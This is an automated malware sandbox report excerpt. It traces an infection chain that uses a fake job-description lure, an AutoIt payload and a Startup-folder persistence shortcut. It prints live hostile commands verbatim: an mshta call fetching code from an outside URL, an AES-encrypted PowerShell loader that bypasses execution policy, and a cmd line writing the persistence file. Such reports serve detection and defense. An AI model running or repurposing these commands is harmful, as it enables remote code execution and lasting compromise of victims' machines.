Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656066428 FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF656066428
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A4F8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656022F50 FindFirstFileExW,16_2_00007FF656022F50
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656001D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,16_2_00007FF656001D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: wscript.exe, 0000001C.00000002.1974623401.00000208397C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 0000001C.00000002.1974623401.00000208397C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\p
Source: powershell.exe, 00000015.00000002.1926160809.00000217E34F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656070A00 BlockInput,16_2_00007FF656070A00
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00007FF655FE37B0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656005BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,16_2_00007FF656005BC0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656077634 LoadLibraryA,GetProcAddress,16_2_00007FF656077634
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604D780 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,16_2_00007FF65604D780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560057E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF6560057E4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560059C8 SetUnhandledExceptionFilter,16_2_00007FF6560059C8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF65601AF58
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656028FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF656028FE4

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00007FF65604CE68
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF655FE37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00007FF655FE37B0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656059420 SendInput,keybd_event,16_2_00007FF656059420
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605D158 mouse_event,16_2_00007FF65605D158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BnQwAP.exe "C:\Users\user\AppData\Roaming\BnQwAP.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = 'b82aeef674ea461ae377f8820935dd6157c01bc158bc192b4d1ff275835196db33cf9ea1de8672ba8f13d9ac875e580005f1eea8672491f8ae79545f0a3e6d28cdebd23fde238e22ef8a9864b4fba2fb0afd2ba44d7dee9a46432584130e7127cfd52a4753431163022c03af7cc276ce0cdae4c73f5fac8bac96006df862d8169bbbe59de533b3d81e857e95c73b04260783980346063862c5e612a3a994e6bb90426e91f2b26513990dc2c312a0aaeeee1e2430571b6262aa184d3bd5c6f41fa7366d5b1d3230ea02d066606a12e58a21b8431bf617f7d977957268a165344d1bc58bff59112747e8eaa5d777bc05a7ed38045d53c5da5bfad3e02c94eca70b8c09c3b0251f7da4dc9d080054a23130e31f08e6713aed726e22995d4273a7a841bcc8666edcafe4d29673b36a8206c7e3ef3ed8e01080c463a9707900bdbefa9f99b4aecd550204798892485f6d659e300cfe096802c6439b262a12242b1359a8ad50e5705da1f36481a32bcfa6a84550378539f30631f5338d15ebb8777eb0c84cc4d6e54178637067a553a9e604c65f3bf58dd192bea48afbf555658eabdc5697f8d58ad5d736f382438d70c4b612ecbfc02ffa54df9e83e7ff840aaef928e8a5e9882628c6d9379a91609b607cb4ff8b760f7d0c6dbf47a7fac72026e33b894ab8d3fa6a6ae87f122119c7b4f7e2d62775a308a302d221eefe5f680a2db166c1a1033c034b27de5331479f36ccdb24ca195ece0042b52ba4878c1a8f8791737c47875a69da16d71e580c06db3f0ab8ef3147c23c6fbb2c2c538207e15d4d789cdd0afc1ef1f49c1c698de94def69bc21348fb6b347482dd337faa5fea6b67d3f934bd5bf565bd06b122c07ef2e3fde1b1730e2e2e5ce71a5aec4e7a6fba6b3801709f0dd9da78a07a71c593622eb95ad7bc50f2bb14e99149243677363b48c9d7a5941a240076c907e45503a494d4b06a3b019f2bb7451e8d82d32f7867901457cc272f82cb802b79bf2845527bb746eedbcf56383f8f7e1cf75c01224b66bde0789795a713dc161ff2b609e9976e1df022746904d8dc89f8ee01f04d892f375924023f6317db683d766704dcc229e3d3ef1ca3e7e1b357a03846b92931a330644457340bf7331a6cb5739f22119d33470250d70590a6f1c0a08150eefa53a0927bb4d168d44a2e0b9b78de17426c1f82271f18f27203aee39aeebe330b479b2b38ee5aa510053589fb1166a4e42792d1bc64a75a303766ac764a47348073e49c426c770fa5b5aeaa2ae449e423cd35861340656797a23c1fd752a26b13575ce28a7313cf32508080f609f9bd9b56f8f7a6d04b10cddc40b660686c1c2a6f90b8cda50b1efa31bf0a15852d8d00c56b7516118fef0030e99c46248ce4b26e648d5f49111f4000436f9b68a5b8062614b4e5179666a715556704755565176';function tkq ($vnripvlz){return -split ($vnripvlz -replace '..', '0x$& ')};$yyrv = tkq($ddg.substring(0, 2016));$pks = [system.security.cryptography.aes]::create();$pks.key = tkq($ddg.substring(2016));$pks.iv = new-object byte[] 16;$udeeb = $pks.createdecryptor();$fbrzq = [system.string]::new($udeeb.transformfinalblock($yyrv, 0,$yyrv.length)); sal fd $fbrzq.substring(3,3); fd $fbrzq.substring(6)
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = 'b82aeef674ea461ae377f8820935dd6157c01bc158bc192b4d1ff275835196db33cf9ea1de8672ba8f13d9ac875e580005f1eea8672491f8ae79545f0a3e6d28cdebd23fde238e22ef8a9864b4fba2fb0afd2ba44d7dee9a46432584130e7127cfd52a4753431163022c03af7cc276ce0cdae4c73f5fac8bac96006df862d8169bbbe59de533b3d81e857e95c73b04260783980346063862c5e612a3a994e6bb90426e91f2b26513990dc2c312a0aaeeee1e2430571b6262aa184d3bd5c6f41fa7366d5b1d3230ea02d066606a12e58a21b8431bf617f7d977957268a165344d1bc58bff59112747e8eaa5d777bc05a7ed38045d53c5da5bfad3e02c94eca70b8c09c3b0251f7da4dc9d080054a23130e31f08e6713aed726e22995d4273a7a841bcc8666edcafe4d29673b36a8206c7e3ef3ed8e01080c463a9707900bdbefa9f99b4aecd550204798892485f6d659e300cfe096802c6439b262a12242b1359a8ad50e5705da1f36481a32bcfa6a84550378539f30631f5338d15ebb8777eb0c84cc4d6e54178637067a553a9e604c65f3bf58dd192bea48afbf555658eabdc5697f8d58ad5d736f382438d70c4b612ecbfc02ffa54df9e83e7ff840aaef928e8a5e9882628c6d9379a91609b607cb4ff8b760f7d0c6dbf47a7fac72026e33b894ab8d3fa6a6ae87f122119c7b4f7e2d62775a308a302d221eefe5f680a2db166c1a1033c034b27de5331479f36ccdb24ca195ece0042b52ba4878c1a8f8791737c47875a69da16d71e580c06db3f0ab8ef3147c23c6fbb2c2c538207e15d4d789cdd0afc1ef1f49c1c698de94def69bc21348fb6b347482dd337faa5fea6b67d3f934bd5bf565bd06b122c07ef2e3fde1b1730e2e2e5ce71a5aec4e7a6fba6b3801709f0dd9da78a07a71c593622eb95ad7bc50f2bb14e99149243677363b48c9d7a5941a240076c907e45503a494d4b06a3b019f2bb7451e8d82d32f7867901457cc272f82cb802b79bf2845527bb746eedbcf56383f8f7e1cf75c01224b66bde0789795a713dc161ff2b609e9976e1df022746904d8dc89f8ee01f04d892f375924023f6317db683d766704dcc229e3d3ef1ca3e7e1b357a03846b92931a330644457340bf7331a6cb5739f22119d33470250d70590a6f1c0a08150eefa53a0927bb4d168d44a2e0b9b78de17426c1f82271f18f27203aee39aeebe330b479b2b38ee5aa510053589fb1166a4e42792d1bc64a75a303766ac764a47348073e49c426c770fa5b5aeaa2ae449e423cd35861340656797a23c1fd752a26b13575ce28a7313cf32508080f609f9bd9b56f8f7a6d04b10cddc40b660686c1c2a6f90b8cda50b1efa31bf0a15852d8d00c56b7516118fef0030e99c46248ce4b26e648d5f49111f4000436f9b68a5b8062614b4e5179666a715556704755565176';function tkq ($vnripvlz){return -split ($vnripvlz -replace '..', '0x$& ')};$yyrv = tkq($ddg.substring(0, 2016));$pks = [system.security.cryptography.aes]::create();$pks.key = tkq($ddg.substring(2016));$pks.iv = new-object byte[] 16;$udeeb = $pks.createdecryptor();$fbrzq = [system.string]::new($udeeb.transformfinalblock($yyrv, 0,$yyrv.length)); sal fd $fbrzq.substring(3,3); fd $fbrzq.substring(6)Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,16_2_00007FF65604C858
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65604D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_00007FF65604D540
Source: powershell.exe, 00000009.00000002.3087042834.000001DD4E994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3087042834.000001DD4EC23000.00000004.00000800.00020000.00000000.sdmp, BnQwAP.exe, 00000010.00000000.1703721677.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BnQwAP.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601FD20 cpuid 16_2_00007FF65601FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65601BEF8 GetSystemTimeAsFileTime,16_2_00007FF65601BEF8
